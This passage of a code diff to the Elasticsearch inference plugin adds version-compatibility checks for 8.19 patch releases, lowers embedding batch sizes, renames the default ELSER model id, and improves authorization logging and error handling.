b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomService.java @@ -355,6 +355,12 @@ public TransportVersion getMinimalSupportedVersion() { return TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED; } + @Override + public boolean hideFromConfigurationApi() { + // The Custom service is very configurable so we're going to hide it from being exposed in the service API. 
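(Editorial aside on the recurring supportsVersion override above, which this PR applies to CustomSecretSettings and to several other settings classes below; the CustomService hunk resumes after the sketch.) getMinimalSupportedVersion() expresses a single cutoff, which cannot describe a feature that landed on main and was also backported to an 8.19 patch release, so these writeables assert that the old method is never consulted and answer supportsVersion(...) directly, accepting either stream. A hedged sketch of the pattern follows; this TransportVersion record, its isPatchFrom semantics, and the two version constants are simplified stand-ins, not the real Elasticsearch types.

```java
// Stand-in for org.elasticsearch.TransportVersion; the id scheme is invented here.
record TransportVersion(int id) {
    boolean onOrAfter(TransportVersion other) {
        return id >= other.id;
    }

    // Stand-in for isPatchFrom: true when this version is a patch release in the
    // same series as `base` (modeled here as the same thousands bucket, id >= base).
    boolean isPatchFrom(TransportVersion base) {
        return id / 1_000 == base.id() / 1_000 && id >= base.id();
    }
}

class SupportsVersionSketch {
    // Hypothetical ids: the feature lands on main and is backported to an 8.19 patch.
    static final TransportVersion FEATURE_ADDED = new TransportVersion(9_001_000);
    static final TransportVersion FEATURE_ADDED_8_19 = new TransportVersion(8_841_002);

    boolean supportsVersion(TransportVersion version) {
        // Mainline streams at or after the feature, or the 8.19 patch backport stream.
        return version.onOrAfter(FEATURE_ADDED) || version.isPatchFrom(FEATURE_ADDED_8_19);
    }
}
```

Under these assumptions, a 9.x stream at or past FEATURE_ADDED serializes the settings, as does an 8.19.x patch stream at or past FEATURE_ADDED_8_19, while older streams skip them.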
+ return true; + } + public static class Configuration { public static InferenceServiceConfiguration get() { return configuration.getOrCompute(); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomServiceSettings.java index 83048120bc545..931eb3b798553 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomServiceSettings.java @@ -394,9 +394,16 @@ public ToXContentObject getFilteredXContentObject() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED) + || version.isPatchFrom(TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { textEmbeddingSettings.writeTo(out); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomTaskSettings.java index bb665cc196bdf..2d43e42781009 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomTaskSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/custom/CustomTaskSettings.java @@ -100,9 +100,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED) + || version.isPatchFrom(TransportVersions.INFERENCE_CUSTOM_SERVICE_ADDED_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeGenericMap(parameters); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/deepseek/DeepSeekChatCompletionModel.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/deepseek/DeepSeekChatCompletionModel.java index 5e9a7e5f93a0b..06f21e19a6408 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/deepseek/DeepSeekChatCompletionModel.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/deepseek/DeepSeekChatCompletionModel.java @@ -176,9 +176,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_DEEPSEEK; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_DEEPSEEK) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_DEEPSEEK_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeString(modelId); diff --git 
a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceService.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceService.java index 640929b058760..4f8d0d01861cd 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceService.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceService.java @@ -89,7 +89,10 @@ public class ElasticInferenceService extends SenderService { public static final String NAME = "elastic"; public static final String ELASTIC_INFERENCE_SERVICE_IDENTIFIER = "Elastic Inference Service"; public static final Integer DENSE_TEXT_EMBEDDINGS_DIMENSIONS = 1024; - public static final Integer SPARSE_TEXT_EMBEDDING_MAX_BATCH_SIZE = 512; + // The maximum batch size for sparse text embeddings is set to 16. + // This value was reduced from 512 due to memory constraints; batch sizes above 32 can cause GPU out-of-memory errors. + // A batch size of 16 provides optimal throughput and stability, especially on lower-tier instance types. + public static final Integer SPARSE_TEXT_EMBEDDING_MAX_BATCH_SIZE = 16; private static final EnumSet IMPLEMENTED_TASK_TYPES = EnumSet.of( TaskType.SPARSE_EMBEDDING, @@ -99,16 +102,18 @@ public class ElasticInferenceService extends SenderService { ); private static final String SERVICE_NAME = "Elastic"; - // TODO: check with team, what makes the most sense - private static final Integer DENSE_TEXT_EMBEDDINGS_MAX_BATCH_SIZE = 32; + // TODO: revisit this value once EIS supports dense models + // The maximum batch size for dense text embeddings is proactively set to 16. + // This mirrors the memory constraints observed with sparse embeddings + private static final Integer DENSE_TEXT_EMBEDDINGS_MAX_BATCH_SIZE = 16; // rainbow-sprinkles static final String DEFAULT_CHAT_COMPLETION_MODEL_ID_V1 = "rainbow-sprinkles"; static final String DEFAULT_CHAT_COMPLETION_ENDPOINT_ID_V1 = defaultEndpointId(DEFAULT_CHAT_COMPLETION_MODEL_ID_V1); - // elser-v2 - static final String DEFAULT_ELSER_MODEL_ID_V2 = "elser-v2"; - static final String DEFAULT_ELSER_ENDPOINT_ID_V2 = defaultEndpointId(DEFAULT_ELSER_MODEL_ID_V2); + // elser-2 + static final String DEFAULT_ELSER_2_MODEL_ID = "elser_model_2"; + static final String DEFAULT_ELSER_ENDPOINT_ID_V2 = defaultEndpointId("elser-2"); // multilingual-text-embed static final String DEFAULT_MULTILINGUAL_EMBED_MODEL_ID = "multilingual-embed-v1"; @@ -174,13 +179,13 @@ private static Map initDefaultEndpoints( ), MinimalServiceSettings.chatCompletion(NAME) ), - DEFAULT_ELSER_MODEL_ID_V2, + DEFAULT_ELSER_2_MODEL_ID, new DefaultModelConfig( new ElasticInferenceServiceSparseEmbeddingsModel( DEFAULT_ELSER_ENDPOINT_ID_V2, TaskType.SPARSE_EMBEDDING, NAME, - new ElasticInferenceServiceSparseEmbeddingsServiceSettings(DEFAULT_ELSER_MODEL_ID_V2, null, null), + new ElasticInferenceServiceSparseEmbeddingsServiceSettings(DEFAULT_ELSER_2_MODEL_ID, null, null), EmptyTaskSettings.INSTANCE, EmptySecretSettings.INSTANCE, elasticInferenceServiceComponents, @@ -213,7 +218,6 @@ private static Map initDefaultEndpoints( DenseVectorFieldMapper.ElementType.FLOAT ) ), - DEFAULT_RERANK_MODEL_ID_V1, new DefaultModelConfig( new ElasticInferenceServiceRerankModel( diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandler.java 
b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandler.java index c0addad455222..28e05b24bad64 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandler.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandler.java @@ -243,14 +243,15 @@ private void sendAuthorizationRequest() { } private synchronized void setAuthorizedContent(ElasticInferenceServiceAuthorizationModel auth) { - logger.debug("Received authorization response"); - var authorizedTaskTypesAndModels = authorizedContent.get().taskTypesAndModels.merge(auth) - .newLimitedToTaskTypes(EnumSet.copyOf(implementedTaskTypes)); + logger.debug(() -> Strings.format("Received authorization response, %s", auth)); + + var authorizedTaskTypesAndModels = auth.newLimitedToTaskTypes(EnumSet.copyOf(implementedTaskTypes)); + logger.debug(() -> Strings.format("Authorization entity limited to service task types, %s", authorizedTaskTypesAndModels)); // recalculate which default config ids and models are authorized now - var authorizedDefaultModelIds = getAuthorizedDefaultModelIds(auth); + var authorizedDefaultModelIds = getAuthorizedDefaultModelIds(authorizedTaskTypesAndModels); - var authorizedDefaultConfigIds = getAuthorizedDefaultConfigIds(authorizedDefaultModelIds, auth); + var authorizedDefaultConfigIds = getAuthorizedDefaultConfigIds(authorizedDefaultModelIds, authorizedTaskTypesAndModels); var authorizedDefaultModelObjects = getAuthorizedDefaultModelsObjects(authorizedDefaultModelIds); authorizedContent.set( new AuthorizedContent(authorizedTaskTypesAndModels, authorizedDefaultConfigIds, authorizedDefaultModelObjects) @@ -337,7 +338,12 @@ private void handleRevokedDefaultConfigs(Set authorizedDefaultModelIds) firstAuthorizationCompletedLatch.countDown(); }); - logger.debug("Synchronizing default inference endpoints"); + logger.debug( + () -> Strings.format( + "Synchronizing default inference endpoints, attempting to remove ids: %s", + unauthorizedDefaultInferenceEndpointIds + ) + ); modelRegistry.removeDefaultConfigs(unauthorizedDefaultInferenceEndpointIds, deleteInferenceEndpointsListener); } } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationModel.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationModel.java index 07c64ab020814..e8dc9c12c94f1 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationModel.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationModel.java @@ -161,4 +161,16 @@ public boolean equals(Object o) { public int hashCode() { return Objects.hash(taskTypeToModels, authorizedTaskTypes, authorizedModelIds); } + + @Override + public String toString() { + return "{" + + "taskTypeToModels=" + + taskTypeToModels + + ", authorizedTaskTypes=" + + authorizedTaskTypes + + ", authorizedModelIds=" + + authorizedModelIds + + '}'; + } } diff --git 
a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandler.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandler.java index 46c56b80e3bec..c1e888d3ecf1c 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandler.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandler.java @@ -9,7 +9,8 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import org.elasticsearch.ElasticsearchWrapperException; +import org.elasticsearch.ElasticsearchException; +import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.action.ActionListener; import org.elasticsearch.common.Strings; import org.elasticsearch.core.Nullable; @@ -86,25 +87,25 @@ public void getAuthorization(ActionListener newListener = ActionListener.wrap(results -> { if (results instanceof ElasticInferenceServiceAuthorizationResponseEntity authResponseEntity) { + logger.debug(() -> Strings.format("Received authorization information from gateway %s", authResponseEntity)); listener.onResponse(ElasticInferenceServiceAuthorizationModel.of(authResponseEntity)); } else { - logger.warn( - Strings.format( - FAILED_TO_RETRIEVE_MESSAGE + " Received an invalid response type: %s", - results.getClass().getSimpleName() - ) + var errorMessage = Strings.format( + "%s Received an invalid response type from the Elastic Inference Service: %s", + FAILED_TO_RETRIEVE_MESSAGE, + results.getClass().getSimpleName() ); - listener.onResponse(ElasticInferenceServiceAuthorizationModel.newDisabledService()); + + logger.warn(errorMessage); + listener.onFailure(new ElasticsearchException(errorMessage)); } requestCompleteLatch.countDown(); }, e -> { - Throwable exception = e; - if (e instanceof ElasticsearchWrapperException wrapperException) { - exception = wrapperException.getCause(); - } + // unwrap because it's likely a retry exception + var exception = ExceptionsHelper.unwrapCause(e); - logger.warn(Strings.format(FAILED_TO_RETRIEVE_MESSAGE + " Encountered an exception: %s", exception)); - listener.onResponse(ElasticInferenceServiceAuthorizationModel.newDisabledService()); + logger.warn(Strings.format(FAILED_TO_RETRIEVE_MESSAGE + " Encountered an exception: %s", exception), exception); + listener.onFailure(e); requestCompleteLatch.countDown(); }); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/densetextembeddings/ElasticInferenceServiceDenseTextEmbeddingsServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/densetextembeddings/ElasticInferenceServiceDenseTextEmbeddingsServiceSettings.java index 5047f34a1b2e3..e8eeee5a34dd4 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/densetextembeddings/ElasticInferenceServiceDenseTextEmbeddingsServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/densetextembeddings/ElasticInferenceServiceDenseTextEmbeddingsServiceSettings.java @@ -205,9 +205,16 @@ public XContentBuilder toXContent(XContentBuilder builder, Params params) throws @Override public 
TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_ELASTIC_DENSE_TEXT_EMBEDDINGS_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_ELASTIC_DENSE_TEXT_EMBEDDINGS_ADDED) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_ELASTIC_DENSE_TEXT_EMBEDDINGS_ADDED_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeString(modelId); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/request/ElasticInferenceServiceSparseEmbeddingsRequest.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/request/ElasticInferenceServiceSparseEmbeddingsRequest.java index 849c48f078cb2..ae52955c1d98f 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/request/ElasticInferenceServiceSparseEmbeddingsRequest.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/request/ElasticInferenceServiceSparseEmbeddingsRequest.java @@ -108,10 +108,10 @@ public boolean[] getTruncationInfo() { // visible for testing static ElasticInferenceServiceUsageContext inputTypeToUsageContext(InputType inputType) { switch (inputType) { - case SEARCH -> { + case SEARCH, INTERNAL_SEARCH -> { return ElasticInferenceServiceUsageContext.SEARCH; } - case INGEST -> { + case INGEST, INTERNAL_INGEST -> { return ElasticInferenceServiceUsageContext.INGEST; } default -> { diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/rerank/ElasticInferenceServiceRerankServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/rerank/ElasticInferenceServiceRerankServiceSettings.java index c20846c7fdfc2..eff22c2771930 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/rerank/ElasticInferenceServiceRerankServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/rerank/ElasticInferenceServiceRerankServiceSettings.java @@ -83,9 +83,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_ELASTIC_RERANK; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_ELASTIC_RERANK) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_ELASTIC_RERANK_ADDED_8_19); + } + @Override protected XContentBuilder toXContentFragmentOfExposedFields(XContentBuilder builder, Params params) throws IOException { builder.field(MODEL_ID, modelId); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/response/ElasticInferenceServiceAuthorizationResponseEntity.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/response/ElasticInferenceServiceAuthorizationResponseEntity.java index 451c601e7cc91..4e2eec9de0456 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/response/ElasticInferenceServiceAuthorizationResponseEntity.java +++ 
b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/response/ElasticInferenceServiceAuthorizationResponseEntity.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.inference.services.elastic.response; +import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.io.stream.Writeable; @@ -14,6 +15,8 @@ import org.elasticsearch.inference.InferenceResults; import org.elasticsearch.inference.InferenceServiceResults; import org.elasticsearch.inference.TaskType; +import org.elasticsearch.logging.LogManager; +import org.elasticsearch.logging.Logger; import org.elasticsearch.xcontent.ConstructingObjectParser; import org.elasticsearch.xcontent.ParseField; import org.elasticsearch.xcontent.ToXContent; @@ -39,6 +42,9 @@ public class ElasticInferenceServiceAuthorizationResponseEntity implements InferenceServiceResults { public static final String NAME = "elastic_inference_service_auth_results"; + + private static final Logger logger = LogManager.getLogger(ElasticInferenceServiceAuthorizationResponseEntity.class); + private static final String AUTH_FIELD_NAME = "authorized_models"; private static final Map ELASTIC_INFERENCE_SERVICE_TASK_TYPE_MAPPING = Map.of( "embed/text/sparse", TaskType.SPARSE_EMBEDDING, @@ -107,6 +113,11 @@ public XContentBuilder toXContent(XContentBuilder builder, Params params) throws return builder; } + + @Override + public String toString() { + return Strings.format("{modelName='%s', taskTypes='%s'}", modelName, taskTypes); + } } private final List authorizedModels; @@ -138,6 +149,11 @@ public List getAuthorizedModels() { return authorizedModels; } + @Override + public String toString() { + return authorizedModels.stream().map(AuthorizedModel::toString).collect(Collectors.joining(", ")); + } + @Override public Iterator toXContentChunked(ToXContent.Params params) { throw new UnsupportedOperationException(); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModels.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModels.java index c1764b93bfc82..e5af1da030ef1 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModels.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModels.java @@ -26,8 +26,4 @@ public static boolean isValidModel(String model) { return model != null && VALID_ELSER_MODEL_IDS.contains(model); } - public static boolean isValidEisModel(String model) { - return ELSER_V2_MODEL.equals(model); - } - } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/googlevertexai/completion/GoogleVertexAiChatCompletionServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/googlevertexai/completion/GoogleVertexAiChatCompletionServiceSettings.java index 105d76a9f8ccb..a753fc5dc66f2 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/googlevertexai/completion/GoogleVertexAiChatCompletionServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/googlevertexai/completion/GoogleVertexAiChatCompletionServiceSettings.java @@ -118,9 +118,16 @@ public String getWriteableName() { @Override public TransportVersion 
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/googlevertexai/completion/GoogleVertexAiChatCompletionServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/googlevertexai/completion/GoogleVertexAiChatCompletionServiceSettings.java
index 105d76a9f8ccb..a753fc5dc66f2 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/googlevertexai/completion/GoogleVertexAiChatCompletionServiceSettings.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/googlevertexai/completion/GoogleVertexAiChatCompletionServiceSettings.java
@@ -118,9 +118,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.ML_INFERENCE_VERTEXAI_CHATCOMPLETION_ADDED;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.ML_INFERENCE_VERTEXAI_CHATCOMPLETION_ADDED)
+            || version.isPatchFrom(TransportVersions.ML_INFERENCE_VERTEXAI_CHATCOMPLETION_ADDED_8_19);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         out.writeString(projectId);
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/completion/HuggingFaceChatCompletionServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/completion/HuggingFaceChatCompletionServiceSettings.java
index af88316ef5161..cdc2529428bed 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/completion/HuggingFaceChatCompletionServiceSettings.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/completion/HuggingFaceChatCompletionServiceSettings.java
@@ -144,9 +144,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.ML_INFERENCE_HUGGING_FACE_CHAT_COMPLETION_ADDED;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.ML_INFERENCE_HUGGING_FACE_CHAT_COMPLETION_ADDED)
+            || version.isPatchFrom(TransportVersions.ML_INFERENCE_HUGGING_FACE_CHAT_COMPLETION_ADDED_8_19);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         out.writeOptionalString(modelId);
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankServiceSettings.java
index 3d4c6aef71e96..b0b21b26395af 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankServiceSettings.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankServiceSettings.java
@@ -115,9 +115,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.ML_INFERENCE_HUGGING_FACE_RERANK_ADDED;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.ML_INFERENCE_HUGGING_FACE_RERANK_ADDED)
+            || version.isPatchFrom(TransportVersions.ML_INFERENCE_HUGGING_FACE_RERANK_ADDED_8_19);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         out.writeString(uri.toString());
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankTaskSettings.java
index 9f90386edff90..8b9e9113bce12 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankTaskSettings.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankTaskSettings.java
@@ -118,9 +118,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.ML_INFERENCE_HUGGING_FACE_RERANK_ADDED;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.ML_INFERENCE_HUGGING_FACE_RERANK_ADDED)
+            || version.isPatchFrom(TransportVersions.ML_INFERENCE_HUGGING_FACE_RERANK_ADDED_8_19);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         out.writeOptionalVInt(topNDocumentsOnly);
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/mistral/completion/MistralChatCompletionServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/mistral/completion/MistralChatCompletionServiceSettings.java
index 676653d54a560..89b9475ad65d8 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/mistral/completion/MistralChatCompletionServiceSettings.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/mistral/completion/MistralChatCompletionServiceSettings.java
@@ -78,9 +78,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.ML_INFERENCE_MISTRAL_CHAT_COMPLETION_ADDED;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.ML_INFERENCE_MISTRAL_CHAT_COMPLETION_ADDED)
+            || version.isPatchFrom(TransportVersions.ML_INFERENCE_MISTRAL_CHAT_COMPLETION_ADDED_8_19);
+    }
+
     @Override
     public String modelId() {
         return this.modelId;
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerModel.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerModel.java
index 48e32c741a601..0975f8616da03 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerModel.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerModel.java
@@ -116,7 +116,7 @@ public SageMakerModel override(Map<String, Object> taskSettingsOverride) {
             getConfigurations(),
             getSecrets(),
             serviceSettings,
-            taskSettings.updatedTaskSettings(taskSettingsOverride),
+            taskSettings.override(taskSettingsOverride),
             awsSecretSettings
         );
     }
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerServiceSettings.java
index 2caf97bdd05b7..b7a554d387c84 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerServiceSettings.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerServiceSettings.java
@@ -111,9 +111,16 @@ public String getWriteableName() {
 
     @Override
     public TransportVersion getMinimalSupportedVersion() {
+        assert false : "should never be called when supportsVersion is used";
         return TransportVersions.ML_INFERENCE_SAGEMAKER;
     }
 
+    @Override
+    public boolean supportsVersion(TransportVersion version) {
+        return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER)
+            || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_8_19);
+    }
+
     @Override
     public void writeTo(StreamOutput out) throws IOException {
         out.writeString(endpointName());
diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerTaskSettings.java
index c1c244cc37051..a36944c51f104 100644
--- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerTaskSettings.java
+++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerTaskSettings.java
@@ -71,11 +71,21 @@ public boolean isEmpty() {
     @Override
     public SageMakerTaskSettings updatedTaskSettings(Map<String, Object> newSettings) {
         var validationException = new ValidationException();
         var updateTaskSettings = fromMap(newSettings, apiTaskSettings.updatedTaskSettings(newSettings), validationException);
         validationException.throwIfValidationErrorsExist();
+        return override(updateTaskSettings);
+    }
+
